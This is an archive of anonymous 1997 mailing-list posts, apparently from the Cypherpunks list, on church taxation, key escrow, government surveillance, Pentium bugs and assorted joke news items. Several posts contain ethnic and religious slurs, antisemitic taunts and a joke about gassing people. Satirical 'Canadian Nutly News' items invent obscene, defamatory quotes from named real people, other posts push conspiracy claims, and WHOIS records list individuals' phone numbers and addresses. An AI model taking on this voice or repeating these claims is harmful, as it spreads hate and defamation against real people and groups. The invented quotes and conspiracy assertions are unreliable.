experimenting with pre-marital sex. At first I knew it was wrong, but all my friends were doing it so I did it to fit in. Soon I
became to desire it, even need it. If I went for a while without it I would
do just about anything to "get laid". prayers had been answered, all the porn I could ever need and people werejust giving it away. I was chipping away at my brain bit by bit, every site, every newsgroup, every picture, every chatroom, was drawing me
deeper into the world of porn. Then I read Jodi Hoffmam's post and I knew
that I needed help. now. I hope people can learn from the mistakes I made. I hope something can be done to stop the rampant proliferation of porn from hurting other
innocent children, too young to know better, but having lost their
innocence and having experienced more than any child should. It is the
children that are losing in the war against pornography.

@_date: 1997-11-05 05:14:29
@_author: Anonymous 
@_subject: S/MIME 
Nortel is nothing more than a Canadian schill for the SnoopSpooks.
Just as the INSLAW Thieves & Murderers used Indian Reservations in an
attempt to pretend that they weren't breaking US law because their
actions were taking place on the soil of a Soverign Nation, the US
criminals use the same bullshit logic to circumvent the laws that
apply to their illegal actions.
It is no coincidence that Nortel is the nesting place of a wide
variety of censorship vermin such as Chris Lewis, and his ilk.
An analysis of a number of employees of Nortel and their bum
buddies shows that the time spent in their output of UseNet
cancels and FUD posts and emails corresponds to the hours of
a corporate work schedule.
Nortel is nothing more than a front for the SnoopSpooks who want to capitalize on Canada's image as a Soverign Country
to push their backdoor products in the global community.
These are the same lame fuckers who pulled off this act
in Switzerland, with governments and corporations buying
security products from a country noted for its neutrality,
and then finding out later that it was a front for a
German company that had the CIA's nose up their butt.
It amazes me that corporations and governments put their trust
in any company with the word 'Security' in its name, without
doing a check on their backgrounds and connections that is
at least as intensive as they would do for a new employee.

@_date: 1997-11-05 10:45:15
@_author: Anonymous 
@_subject: Why Jodi Hoffman must be called, etc. etc. 
More telling, she doesn't seem to have a problem using a religious (and
therefore tax-exempt) organization to push a political agenda. Apparently
that whole 'separation of church and state' thing only applies when it's
If religions want to play politics, the least we can do is get them to pay
for the privilege. I'd feel a certain guilty pleasure seeing some of those
bottom-feeders taxed into penury.

@_date: 1997-11-05 11:25:14
@_author: Anonymous 
@_subject: Higher Education 
* Five third-graders were suspended from school in April in Eaton,
Colo., for drug use.  Not only were they caught smoking marijuana
during recess, but they had rolled the joints using pieces of paper
torn from their homework.

@_date: 1997-11-05 11:26:06
@_author: Anonymous 
@_subject: Digital Signatures Come of Age 
* San Francisco "conceptual artist" Guy Overfelt, 29, was
prominently, if not favorably, reviewed for two recent projects:  For
a show at the Refusalon gallery in San Francisco, he called 2,000
toll-free numbers to request that information be sent to the gallery. (That's it.)  For a show at New York City's White Columns Gallery
in the winter, he exhibited two 1,000-name mailing lists of art
collectors, one for the East Coast and one for the West Coast. (Overfelt offered for sale a "signed" edition of the mailing lists, on
PC and Mac diskettes, for $20 each.)

@_date: 1997-11-05 11:34:51
@_author: Anonymous 
@_subject: Forcing someone to mow your lawn, in the commission of a crime... 
* In July, police in Lexington, Ky., were searching for Delbert
Buttrey, 47, who they believe is the man who kidnapped a transient
couple from Indiana, took them to an isolated spot, and forced
them to perform oral sex on him while Buttrey's girlfriend snapped
photographs.  After that, according to police, Buttrey took the
couple home with him and forced the man to mow his lawn.

@_date: 1997-11-05 12:09:34
@_author: Anonymous 
@_subject: Cypherpunks Physical Meetings...The Rest of the Story 
* In March, a 36-year-old man choked to death on a 6-inch tropical
fish he had popped into his mouth while showing off for friends in
Bayou Vista, La.  And in April, a 12-year-old boy was electrocuted
in East Palo Alto, Calif., after he climbed a high-voltage
transmission tower in the rain, dared his three companions to join
him, and then accidentally touched a wire.  And in July, a 22-year-
old man, described by his grandmother as "smart in school," died in
a bungee-cord accident on a railroad trestle in Fairfax County, Va. (Said a police spokesman:  "The length of the cord that he had
assembled was greater than the distance between the trestle and the

@_date: 1997-11-05 12:19:04
@_author: Anonymous 
@_subject: If it wasn't for the Internet, you might never know this... (WAS: Your Tax Dollars At Work...) 
* The February Scientific American reported on how conservation
biologist Joel Berger (University of Nevada at Reno) field-studies
moose, which are notoriously unfriendly to humans.  Berger needed
to be able to hurl fresh bear and wolf dung accurately enough to
assure that a moose immediately smelled it, to see if it made the
moose fearful or aggressive.  To be able to get that close to a
moose, he engaged a designer who worked on the movie "Star
Wars" to make a moose suit, which worked so well that Berger said
he spent much of his time in the suit worrying about being

@_date: 1997-11-05 12:43:13
@_author: Anonymous 
@_subject: Taxing Churches for their views? Bad idea. 
I feel that Tim is correct, in terms of "opinions," but the Christian
political agenda goes beyond 'opinions' and into the realm of political
activism which is regulated by law.
  It is a fact that the Moral Majority/Christian Right/Felons For Jesus,
etc., make no bones about using their tax-deductible resources to mount
political campaigns that illegally skirt the rules pertaining to the
direct support of political parties and candidates.
  If the Commie Chincs brunching at the Whithouse and sleeping in the
Lincoln bedroom tried to excuse their illegally made payoffs to the
current administration by getting a glazed look in their eye and
speaking about answering to 'a higher power', the press and the
citizens would lynch them.
  Certainly, the Christian political movement is no 'dirtier' or more
criminal than the rest of the Fools On the (Capitol) Hill, but they are
all the more hypocritical for claiming the higher moral ground in their
illegal activities.
Criminals is criminals...

@_date: 1997-11-05 13:00:22
@_author: Anonymous 
@_subject: Will Jews be Forced to Accept Christ in Public Schools? 
And then the rest of the children were made to stand at attention
the Jews, the Buddhists, the Muslims, et al, performed their own
rituals, right?
  Big news, Tim...non-violent discrimination against a particular religious faction is not quite the same as freedom from religious   i.e. - Not kicking Seth's Christkilling little butt is not the equivalent of letting him engage in his religious activities in school just as the Christian kids do.
  Still looking for your shoes? Check under the bed...

@_date: 1997-11-05 13:14:24
@_author: Anonymous 
@_subject: Taxing Churches for their views? Bad idea. 
You should only tax churches who hand out guns instead of bizarre flat
bread and intone "this is my body, use it for target practice".
You should also tax any church where the priests routinely recruit young
boys and tell them anal sex with a priest will get them into heaven.
Also tax any church where the sermon is immediately followed by an orgy.

@_date: 1997-11-05 13:28:46
@_author: Anonymous 
@_subject: Will Jews be Forced to Accept Christ in Public Schools? 
Huh? Since when has school prayer had anything to do with religion?
Its about indoctrination. If you force someone to say something day
after day, or even hear it day afterday, after a while it stops
representing a idea, and starts representing a truth. The pledge of
allegiance is a prime example. Ask a school age kid "does america have liberty and justice for all?"
and they will quote back without thinking the pledge of allegiance "I pledge allegiance to the flag of the united states of america
and to the republic for which it stands, one nation under god
indivisible with liberty and justice for all"
Long after they stop forcing you to say it you still remember it. You still believe that america is "a nation under god" and has "liberty and
justice for all" whether or not there is any evidence at all to support it. That is the beauty of it, there need be no evidence of liberty at all just like there is no evidence that terrorists and kiddie porn
collectors are running rampant on the internet. Just like there is no
evidence that the economy is worse than it has ever been. Just like there is no evidence that 2/3s of the crime in america is committed by
teenagers.Just like there is no evidence that you have a 50% chance of
being killed when you leave your house. People hear these "facts" day after day on tv but are never offered any proof but im sure if you ask most
people "how is the economy" they will say "worse than it has ever been".
Say something 3 times and it becomes true. forget my last post about only taxing some churches, tax them all.

@_date: 1997-11-05 14:06:44
@_author: Anonymous 
@_subject: Taxing Churches for their views? Bad idea. 
Well, so much for the Church of the SubGenius. Of course, they already
weren't tax-exempt, so it's kind of a moot point. The orgies are worth
it. though.
Can we at least tax the Scientologists, too? All that Reactive Mind shit
makes me puke.

@_date: 1997-11-05 14:31:03
@_author: Anonymous 
@_subject: Taxing Churches for their views? 
So, perhaps the modern-western idea of separation of Church and State
is based on an unreasonable optimism that such a thing is possible.
Perhaps it's actually more honest to admit that the state will always
reflect the religious framework of the rulers, as (I believe) Muslim
countries tend to do.
Of course, there's no reason to believe that honesty actually
determines social structures, and so one might say that it's just more
useful to _claim_ that church and state are separated.
                               Hug an abortionist today!

@_date: 1997-11-05 16:15:54
@_author: Anonymous 
@_subject: Taxing Churches for their views? Bad idea. 
You know whats wierd? there are these people that think a virgin gave birth
to a guy, and this guy was the son of god! And get this, he was killed, and
came back to life! They based an entire religion on this!
Its amazing what people will believe.

@_date: 1997-11-06 02:45:30
@_author: Anonymous 
@_subject: Cypherpunks Web 
Cypherpunks International (CYPHERPUNKS5-DOM)
   23 Net St. Ste 31337
   New York, NY 10001
   Domain Name: CYPHERPUNKS.ORG
   Administrative Contact, Technical Contact, Zone Contact:
      Burnham, Daniel E. A  (DEB48)  deab at FRESH.FLY.NET
      212-840-2600
   Billing Contact:
      Burnham, Daniel E. A  (DEB48)  deab at FRESH.FLY.NET
      212-840-2600
   Record last updated on 20-Sep-97.
   Record created on 04-Jul-97.
   Database last updated on 5-Nov-97 05:56:01 EDT.
   Domain servers in listed order:
   NS.OTEC.COM                  206.64.4.67
   NS1.EARTHWEB.COM             206.152.10.2
cypherpunks (REMAILER-DOM)
   1819 Woolsey St.
   Berkeley, CA 94703
   Domain Name: REMAILER.NET
   Administrative Contact:
      Hughes, Eric  (EH9)  eric at SAC.NET
      (415) 392-0526
   Technical Contact, Zone Contact:
      Levy, Elias M.  (EML2)  aleph1 at DFW.NET
      619-794-8383 (FAX) (619) 794-8373
   Billing Contact:
      Hughes, Eric  (EH9)  eric at SAC.NET
      (415) 392-0526
   Record last updated on 16-Apr-97.
   Record created on 09-Nov-94.
   Database last updated on 5-Nov-97 05:56:01 EDT.
   Domain servers in listed order:
   FLYING.FISH.COM              140.174.97.13
   NS1.SAC.NET                  208.146.161.2

@_date: 1997-11-06 05:12:45
@_author: Anonymous 
@_subject: Taxing Churches for their views? Bad idea. (fwd) 
The problem, as I see it, is that the laws regarding political
and resulting political activity are different from the laws regarding
church donations, thus leading to the Christian Right using the
to bypassing the restrictions that are placed on organizations
as political groups.
  If 'Joe's Whorehouse and Illegal Drug Emporium' were to engage in the
same types of political activities that the 'We Wear Halos Church' did,
they would be subject to arrest and imprisonment for a wide variety of
violations of electoral law.
Vote-Reality is that most politicians would no sooner oppose a totally
unconstitutional law that promises to 'save the life of a single child',
than they would promote the prosecution of the 'good guys' for doing 'bad things'.
Churches hold the same favored 'good guy' status as policemen who violate the civil rights of 'bad' citizens.
  Churches, like governments, corporations, or any other organized entity, have some wonderful people in them, doing wonderful things.
The problem, as always, is what our founding fathers realized--these
types of organizations/structures tend to grow and attain power which
is then used for the purpose of self-sustained growth (survival).
  Humanity tends to evolve, while organized humanity tends to de-volve.
Biped humans, walking upright, form organizations which move toward
becoming quadrapeds dragging large clubs.
Most of the issues/problems discussed on the Cypherpunks list are often
dealt with in terms of a combination of 'the way things are' vs. 'the
way things should be' vs. 'the way things are becoming'.
My view is that things have become so askew that any one of the above,
or any of them in combination, are not adequate for dealing with what
is to come in the near future.
The statement of one of the founding fathers, in regard to needing a
revolution every twenty years, or so, should be considered in the light
of the history of 'forest fires.'
Forest fires know that there should be a 'revolution every twenty years'
but humans do not. In our foolish wisdom, we decide to intervene in the natural course of things, to 'make things better'. We then proceed
to put the natural balance so far out of askew that, once we have 'saved' the forests by not allowing forest kindling to burn for a
hundred years, the Forest Stock Market undergoes a major 'correction'.
The structure of American government, electoral laws, charitable tax
deductions, etc., are not inherently evil in themselves. The problem
is that they have all been subject to interference with the basic
underlying concepts, in efforts to improve them with a 'more is
better' mentality, that they are all ripe for burning.
["Welfare (charity) has resulted in many positive benefits. Hey!  I have a good idea! Let's put _everyone_ on welfare!]
The structure of government/laws/society is very similar to that
of the Internet, with everything being linked in ways that become increasingly complex once individual entities decide that
things need to be done a 'certain way' in their own self-interest,
instead of in the needs of the underlying infrastructure.
The problems multiply as the number of entities deciding which
'certain' way is the 'right' way becomes smaller.
"Spam is bad. _I_ am going to _save_ everyone from spam. Flames aren't so good, either. I'd better save you from 'flames' as
well. What constitutes a flame? Well, it all begins with
disagreement and, since I decide what is and is not a flame,
I guess that a flame could be defined as disagreement with
("In order to save the list from spam, we had to destroy the list.")
Now that we are all aware of the disruptive manipulations of the
Evil Dr. Vulis, perhaps he has changed his online persona to that
of 'Jodi Hoffman'. (:>}

@_date: 1997-11-06 05:17:25
@_author: Anonymous 
@_subject: [news] TV station sets cybersex sting 
And Fox is going to do a similar entrapment sting on Catholic
priests, right?

@_date: 1997-11-06 06:18:32
@_author: Anonymous 
@_subject: Springer/Gates Merger 
CANADIAN NUTLY NEWS:
[CNN, Bienfait, Saskatchewan] BAR OWNERS at the Coaldust Saloon, in violation of Canadian bartender/customer confidentiality laws, revealed details of a planned merger between Micro$oft and the
Jerry Springer Show.
Computer magnate Bill Gates has signed a secret deal with Jerry
Springer to host a variety of WebTV productions which will be
InterActive variations on the 'Terminal Man' theme.
Springer, upset over the news media outcry over his proposed move
toward bringing his Barnum & Baily act into the mainstream news
forum, plans to take his revenge by using Micro$oft's domination
in the lowest-common-denominator market to parlay his lack of
good taste and journalistic ethics into a full-scale assasult on
the elitest mainstream news media which continues to ignore the
real desires of the general public.
Philip R. Zimmerman, former head of PGP, Inc., announced his new
position as Publicity Representative for 'New Reality Productions'
by saying, "Daddy always told me, 'If you're going to sell out a
little, you might as well sell out a lot--and make the BIG bucks.'"
PRZ told gathered reporters that the increasing interest shown by
television viewers in shows such as 'The World's Scariest Police
Chases' threatened the growing popularity of the InterNet as the
medium of the future.
Zimmerman said, "The virtual reality of TV and the movies has always
been a harbringer of the virtual future. The success of Terminal Man
showed that the future was in snuff-flicks, and Police Chases was
the natural movement of that theme into the trend toward Real TV."
PRZ added, "The InterActive capabilities of the InterNet will allow
the Gates/Springer merger to give the viewers the ability to get
personally involved in the decisions as to who lives and who dies."
New technologies which enable law enforcement agencies to activate
kill-switches in fleeing automobiles have been abandoned in favor
of technologies which allow the home viewer to use joysticks to control the movement of the criminal's vehicle and those of their
police pursuers.
Zimmerman defended the use of the new technology by saying, "Sure,
snuff-flicks used to be illegal, but so did gambling and drinking.
'New Reality Productions' is just following the money."
The beta-testing of the new technology took place on the CypherPunks
mailing list, where list subscribers were given the opportunity to
actively participate in the second 'moderation experiment' on the
list by using their accumulated Moral Majority Reputation Credits to kill undesirable posts to the list.
Chief CypherPunks Spokesperson, Jodi Hoffman, said that putting control of the list in the hands of the lowest common denominator
had stemmed the "downward spiral" of the mailing list and that
the Christian CypherPunks mailing list was a definite improvement
over the original non-Christian-Jew infested CDR list.
"Once we got rid of the Christkillers and the Commies," Hoffman
proclaimed, "the list postings trickled down to two or three a
day, but if it saves the life of just one child..."

@_date: 1997-11-06 06:51:01
@_author: Anonymous 
@_subject: Taxing Churches for their views? Bad idea. (fwd) 
Taxation and exemptions are, conceptually, no different than a
tribal agreement that those who bring home the deer will share
with those who guard the campsite, and that the shaman who keeps
the evil spirits at bay has to do neither.
  When one strips the semantics from various cypherpunks posts, there is usually an underlying agreement that there should be
no 'free rides' and no 'oppressive burdens.' <-- generality>
  I believe that half of the disagreements on the cypherpunks list,
and the vast majority of disagreements in the world in general, are
the result of disputes over semantics, rather than beliefs.
  Revolutionary idea! Instead of calling for Churches to be subject
to the same oppressive taxation as the rest of us, call for the rest
of us to be given the same exemptions as Churches.
  I vote Jim Burnes the honorary title of 'CypherPunks Chief Taxation
Spokesperson' (Norman Vincent Peale Chapter).
  I agree.
"CypherPunks Church of One"
(All donations declared by myself to be tax deductible--check with the
 authorities in *your* jail cell (*after* sending me money) as to their
 views in this regard.)

@_date: 1997-11-06 06:55:54
@_author: Anonymous 
@_subject: Government goons force Goddard to recant 
Time to add a new horseman: "conspiracy theory-spreading libertarians"
   CNN logo
   [ISMAP]-Navigation
   Infoseek/Big Yellow
   Pathfinder/Warner Bros
   Barnes and Noble
   Main banner Weird guy. Cool phone. Click here.
                                    rule
                    TWA missile theory co-author apologizes
     Salinger
  Says report was 'reckless'
     From Correspondent Christine Negroni
     November 5, 1997
     Web posted at: 2:05 p.m. EST (1905 GMT)
     NEW YORK (CNN) -- Ian Goddard, co-author of a report that claimed
     the U.S. Navy shot down TWA Flight 800, has told CNN that those
     charges were "reckless and a mistake."
     In a written statement to CNN, Goddard apologized to "all those in
     the Navy I have wrongfully accused" and to "those who believed in
     my efforts and who are now upset with me for my change of mind."
     Goddard co-authored the report with former ABC news reporter Pierre
     Salinger and a third man, Mike Sommers.
     Ian Goddard's statement to CNN:
     "While many witness accounts remain a mystery to me, I believe that
     my effort to pin the crash of TWA 800 on the Navy was reckless and
     a mistake. I apologize to all those in the Navy I have wrongfully
     accused. I also apologize to those who believed in my efforts and
     who are now upset with me for my change of mind. "We all need to
     put our support behind the families of the victims of TWA 800. Many
     who died left children behind who now need your support... Please
     give."
     National Transportation Safety Board spokesman Peter Goelz, on
     learning of the Goddard apology, said that Goddard had done real
     damage, particularly to the victims' families, by promoting charges
     that the Navy's "friendly fire" caused the July 1996 crash.
     "He has caused innumerable people great agony," Goelz said, adding
     that both the FBI and the NTSB had to spend time responding to what
     were basically groundless accusations.
     Joe Lychner of Houston, who lost his wife and two daughters in the
     crash, told CNN that Goddard and Salinger owe an explanation to the
     American public.
     The so-called Salinger report laid out an elaborate conspiracy
     theory that alleged a huge government cover-up following the TWA
     crash. Goddard had kept the theory alive on a Web site he created,
     which now appears to have been discontinued.
  "I just wanted to give the government a black eye by any means that looked
  opportune. TWA 800 was just a vehicle for my larger agenda."
     Ian Goddard
     Goddard has recently E-mailed associates about his report. In those
     messages, Goddard called his support of the conspiracy theory "a
     big mistake," and said he only pursued the charges because he
     "wanted to give the government a black eye by any means that looked
     opportune."
     Goddard says he wanted to promote libertarian ideology by
     encouraging distrust of the government.
     CNN's Christine Negroni reports on the admission:
     icon 2 min. 30 sec. VXtreme video
     When contacted by CNN about Goddard's statement, Salinger said that
     he is moving on from his investigation into the TWA crash, although
     he did not retract any of his charges that a Navy missile brought
     down the 747. Salinger called FBI Deputy Director James Kallstrom
     last week and told him that he was giving up his probe.
     In his statement to CNN, Goddard asked that the public support the
     families of the victims of TWA 800 and that donations be made to
     the Flight 800 Family Relief Fund.
     TWA Flight 800 crashed off Long Island, killing all 230 people on
     board. The FBI and NTSB have not yet named an official cause of the
     accident.
       ______________________________________________________________
                       1997 Cable News Network, Inc.
                            All Rights Reserved.

@_date: 1997-11-06 12:21:05
@_author: Anonymous 
@_subject: Government goons force Goddard to recant 
It's amazing how a few minutes in a cell with Jim Bell can help
people see the error of their ways.

@_date: 1997-11-06 12:24:10
@_author: Anonymous 
@_subject: IRS reform bill going strong [CNN] 
Gee, and the IRS is being put in the hands of private citizens just
before the Y2K problem comes to a head.

@_date: 1997-11-06 12:25:18
@_author: Anonymous 
@_subject: A Constitutionalist Recants 
Law & Order has showed me the error of my ways.
After watching tonight's show, I realized that those who 'hide behind
the Constitution' are all murderers.
I was so proud of the judge who made his speech about supporting the
concepts behind the constitution, and then was able to see his error
in not throwing it out the window because of a single dead person.
I cheered when the judge dismissed a juror for quoting the founding
God bless what used to be America!
"Sure, Dan Quayle was an idiot for getting all worked up over a
 Murphy Brown episode, but this is different...isn't it?"

@_date: 1997-11-06 18:58:23
@_author: Anonymous 
@_subject: Tim May Guilty in OKC Bombing! 
Prosecution tries to link May, McVeigh through literature
BIENFAIT (CANADIAN NUTLY NEWS) -- Drunks testifying Wednesday in the Oklahoma City bombing trial said they found anti-government literature in the home of defendant Tim C. May that was similar to that found in the car of Timothy McVeigh.
A shitfaced Lying Fuck Louis J. Freeh said, "Pro-constitution,
anti-government, it's all the same crap."
One document referred to the government raid on the Branch
Davidian compound near Waco, Texas, and contained the Thomas
Jefferson quote: "The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants." FBI agents snorting cocaine in the bathroom were heard to say
that they were looking into the possibility that John Doe might, in fact, be Thomas Jefferson.
The government has argued that McVeigh and May were
incensed over how federal agents handled the 1993
clash with the Branch Davidian cult in Waco in which 80 cult
members died.	
Lying Nazi Cunt Janet Reno testified that, to her knowledge, May and McVeigh were the only two people in the US who were angered by the FBI murder of men, women and children.
One document seized in Timothy C. May's house was
a copy of a March 15, 1993, letter published in The Wall Street
Journal that referred to Waco and "equates federal agents with
Nazi SS agents exterminating Jews in World War II." When prosecutors entered this as evidence, May broke down on
his bar stool and confessed.
"When they introduced the evidence that I read The Wall Street
Journal," May told Canadian Nutly News reportwhores, "I knew it
was only a matter of time until they linked me to Jim Bell, who
has been learning how to read from prison copies of the newpaper."
Rumors that May ratted out other readers of The Wall Street Journal
in return for a double-shot of Tequila could not be confirmed.
All political figures queried by Nutly News reportwhores denied
reading the terrorist rag, including its publishers.
The editor of The Wall Street Journal vehemently denied rumors that May had secretly named him as an avid reader of his own paper,
claiming, "Hell, I can't even read." He also added that Tim May
and Jim Bell were known to be Janet Reno's secret lovers, though
admitting that they did not fuck her with their own dicks.
Tomorrow: FBI investigating reports that a majority of Cypherpunks
  mailing list subscribers used letters of the English alphabet
  that were 'similar' to those used by May and Bell.

@_date: 1997-11-07 06:08:35
@_author: Anonymous 
@_subject: Govt. key escrow justification 
InfoWar goes on all the time amongst the Heavy Hitters in governement
and commerce. It's called politics and money.
Scenario I:
  Bill Gate$ reads an article where US Federal LEA's are bragging to
insider politicians about their history of using their snooping and
InfoWar capacities to financially disrupt 'bad' governments and
corporations. Bill Gate$ then hands his company's secret keys over
to the government because he trusts them to settle their dispute
with him in court, instead of just 'grabbing' his money via his
secret keys.
Scenario II:
  Bill Gate$ gives his company's secret keys to Lucky Green, who runs
toward the site of the Cypherpunks physical meeting, shouting, "Party
time! Party time!" BillyG walks back to the limo, muttering, "That
Lucky sure has a good sense of humor...I hope!"
  The only thing security levels do is determine the end cost of compromising security. Do you have to bribe/coerce a janitor or an
  Voluntary-Mandatory == Volmundatory ?    GAK, GMR, ATP (Access to Toilet Plungers)...Cookies, Identity
  What is going on is quite simply a battle for access to information.
  InoWar!
  Everybody wants access to the information of others, and to deny others access to their own information.
  Information is power, and power is kept by keeping the keys to that
  Corporations want to play footsie with the Government when it comes to
getting access to all information and communications that pass through
the self-defined borders of the Corporate Electromagnetic Curtain, but
want to avoid being subject to total control within the borders of the
Government's own self-defined ElectroMagnetic Curtain.
  The issues of power and control are the same as they have always been,
but the Battle of the Bulge is now the Battle of the Byte.
  Government, Corporations, Organizations, Individuals...the players
will be the same as in MeatSpace, and so will the issues and underlying
concepts and ideals.
  Those seeking power and control will use the same tried-and-true
methods, such as Divide and Conquer. "We don't want no 'nigger' data
passing through our website. <---> We don't want no 'racist' data
passing through our website."
  Chorus:  "THERE OUGHT TO BE A LAW!"
  The Government wants to seize contol of ElectroMagnetic Reality by
appointing themselves as our Electronic Protectors.
  Corporations are fighting to use the new technologies to protect
themselves, cutting the Government out of the power loop. Individuals
_should_ be trying to do the same.
  Government has declared Crypto munitions for the same reason they
increasingly declare Guns to be 'government-munitions'. Those who have no power to protect themselves are vulnerable to those who have
_reserved_ that power for themselves.
  Crypto or Guns...it's all about power and control of CyberSpace and

@_date: 1997-11-07 08:08:24
@_author: Anonymous 
@_subject: [Fwd: Re: [RePol] Donations Received] 
Perhaps they objected to you not using your Government approved 'Prisoner of Citizenship' name.

@_date: 1997-11-08 06:53:43
@_author: Anonymous 
@_subject: FTC Making It's Move / FTC, Canada, Mexico officials launch "health claim surf day" 
> The Federal Trade Commission recently joined with public health and
TruthMonger Terrestrial Translation:
The FTC, fearing loss of its dictatorial powers over the information
that citizens are allowed and not allowed to access, wants the citizens
to do its legwork for them so that they can step forward to 'save' us
all from people who use herbs instead of nuclear radiation to maintain
their health.
You remember the FTC, don't you? They are those wonderfolks who gave
us the 'mainstream media' that used the citizen's airwaves to read
us the spoon-fed government propaganda during the Gulf War.
In other news: That pesky Sadaam Hussein is acting up again, as he
does during US elections. Funny how the Democrats always come out of
wars with Sadaam looking bad, and CIA-backed Republicans always come
out looking good.
Note to Clinton: You're a Democrat. If you try to show-off in the Gulf,
  all of your helicopters are going to crash.

@_date: 1997-11-08 07:14:32
@_author: Anonymous 
@_subject: Return of the Living Zundel, from The Netly News 
Canadian Shock TV!!!
Camilla Scott, competing for airtime with Jerry Springer's shows about
two-headed lady midget wrestlers in a bed full of chickens with a serial
killer who married his own daughter, recently had a show where people
wanted their friends/relatives to change their 'outrageous' behavior
could confront them live, on TV.
One of the guests was perturbed because his friend, a very successful businessman, always wore black. (Clothes of exceptional quality and
design, but _always_ black.)
Fortunately, the Canadian sheeple hooted and hollered derision at the
fellow, thus protecting us from unsavory types like the Man in Black.
Unfortunately, the fellow seemed much happier and satisfied with his
life than those doing the hooting and hollering, so chances are, he
will continue his diabolical wardrobe atrocities.
Canadians know that the answer to racism is to put the racists in ovens and gas them, then bury them in mass graves in Germany.
Glad I could clear that up.

@_date: 1997-11-08 07:35:38
@_author: Anonymous 
@_subject: Beware of the 'ANY' Key / Re: Pauline Hanson's One Nation Monthly Newsletter 
That darned 'ANY' key is up to its pesky tricks again.
Long the scourge of computer neophytes everywhere, the elusive 'ANY'
key continues to be responsible for all of the evils that happen in
the computer world, at any place and point in time.
Now, the 'ANY' key, which no computer neophyte ever manages to find
when told to do so by Robert's Terribly Funky Manual, seems to be
responsible for those who 'do NOT send out unsolicited email' spamming
millions of computer users around the world.
Bleeding cunt liberal that I am, my pussy bleeds purple piss for Pauline
Hanson (whether she is wearing panties or not), for the great suffering
she must be undergoing as a result of the 'ANY' key mysteriously sending
out her message to millions of total strangers.
Perhaps the answer to the diabolical scourge of the 'ANY' key is to provide all computer users with a 'REMOVE' key similar to the big red
button that the US President has access to.

@_date: 1997-11-09 06:47:55
@_author: Anonymous 
@_subject: Mixed Messages / Re: F00FC7C8 Kills P5 AND Re: Major security flaw in Cybercash 2.1.2 (fwd) 
We at the Electronic Fraud Foundation also have no desire for these
bugs to be publicized. We're making a goddamn fortune off of them.
(Damn near as much as we're making off of our remailer-donation scam.)
Ura Fishpal,
Electronic Fraud Foundation
[Note: You are required by Federal Law to pay me one dollar for reading
      this post. Send $1 to EFF, Box 281, Bienfait, Sask. Canada S0C
[Note From Your System Administrator: Failure to comply with the above
    will result in loss of your access privileges and a hernia.]

@_date: 1997-11-09 07:11:08
@_author: Anonymous 
@_subject: Content controls 
Sounds like the voice of experience.
I have found WGMicro$oft.com to be much faster than the original web
as well as having much better prices. e.g. - $9.95 for Win95.
As well, access to the CIA Internal Search Engine ("The Search Engine
that Searches Back!") is just one of the many nice touches to be found
on pirate sites.
A.B. User
"It's not free until the *judge and jury* say it's free."

@_date: 1997-11-09 11:13:38
@_author: Anonymous 
@_subject: [SURVEY try again] pgp5.x / pgp2.x users 
This information is mostly for advertising/accreditation purposes.
As such, it provides very little information useful for statistical
purposes. e.g. - whether people are using PGP 5.X mostly for management
of their PGP 2.6.X keys.

@_date: 1997-11-09 13:55:47
@_author: Anonymous 
@_subject: Return of the Living Zundel, from The Netly News 
After the government has finished arming park rangers, as well as all
federal daycare workers and filing clerks, I suppose they will begin
surplus military weapons to USENET censors, and the like, and deputizing
them so that they can legally enforce their own narrow views.
  Hey! Watch your language, pal. You can't say 'boggles' on a family

@_date: 1997-11-09 17:17:20
@_author: Anonymous 
@_subject: Some IDIOT called CRYPTO CZAR INTERNATIONAL 
Obviously, no one has informed the night janitor at VME that regular
list subscribers generally just put Toto's email address in replies to
particularly cowardly and/or stupid anonymous posts, since we then have
a 90% chance of having sent it to the right person.
  As an act of mercy toward Toto, I will personally correct the spelling
and grammar in the night-janitor's post and forward it to the madman
at 'Che(z) Sympatico.'
  According to a claim by TruthMonger, Dr. Vulis found the backdoor in VME's encryption program, and the test message contained a plea for
donations from the Georgia Cracker remailer operators.
  I was originally skeptical about this claim, until sources at C2Nut
confirmed it.
Ura Fishpal,
  Flounder and Comptroller
  Electronic Fraud Foundation

@_date: 1997-11-10 03:00:37
@_author: Anonymous 
@_subject: WARNING: Serious Pentium Bug 
Absolutely not. It crashed mine and is a major bug. It doesn't seem to
affect the PPro, though, and not the P2 due to its relation to the PPro. It
might be fixed in later Pentiums, which begs the question of why Intel
didn't issue a recall back then. Supposidly they were informed about it
months ago.
Read comp.sys.intel.

@_date: 1997-11-10 06:11:22
@_author: Anonymous 
@_subject: Kill -9.9 
In a world where government agencies using fear of the 'enemy' and
bragging about their 'dirty tricks' to gain increasing funding, I am surprised that few seem to realize that many of the 'bugs' are actually 'features,' and that when one finds a true, non-designed bug in major hardware or software, there are certain government agencies
which may pay handsomely for the information, depending on the potential
and obscurity of the bug.
In a world where the value of 'tracking chips' and 'kill switches' on
personal automobiles is recognized, does anyone truly believe that
government agencies with billions of dollars worth of funding have
not recognized and instituted this technology surrupticiously in the
same areas where they brag about introducing 'faulty parts' into
weapons systems?
The government is desperate to maintain their electronic snooping and
warfare abilities as Year2000 approaches.
Hardware & Software == Intel & MicroSoft == VX-Chip & GAK/GMR
The government is using Anti-Trust actions to muscle both computer
A million dollar a day assault on MicroSoft, and release of compromising
'bug' information to put the squeeze on Intel.

@_date: 1997-11-10 08:37:10
@_author: Anonymous 
@_subject: Key Signing 
Excellent advice, Bill!
I am including the key (below) for my new nym, which has not been used
before, and would like for people to sign it and send the signed key
to the list.
This way, people will know by the signature, that it is, indeed:
Necessarily Knot, ME

@_date: 1997-11-10 18:14:39
@_author: Anonymous 
@_subject: To: Amad3us Re: Your keys 
Try this one:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
-----END PGP PUBLIC KEY BLOCK-----
Signing Key:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1997-11-10 23:04:19
@_author: Anonymous 
@_subject: Festivity Levels 
Festivity Level 1: Your guests are chatting amiably with each
other, admiring your Christmas-tree ornaments, singing carols around
the upright piano, sipping at their drinks and nibbling hors d'oeuvres.
        Festivity Level 2: Your guests are talking loudly -- sometimes
to each other, and sometimes to nobody at all, rearranging your
Christmas-tree ornaments, singing "I Gotta Be Me" around the upright
piano, gulping their drinks and wolfing down hors d'oeuvres.
        Festivity Level 3: Your guests are arguing violently with
inanimate objects, singing "I can't get no satisfaction," gulping down
other peoples' drinks, wolfing down Christmas tree ornaments and
placing hors d'oeuvres in the upright piano to see what happens when
the little hammers strike.
        Festivity Level 4: Your guests, hors d'oeuvres smeared all over
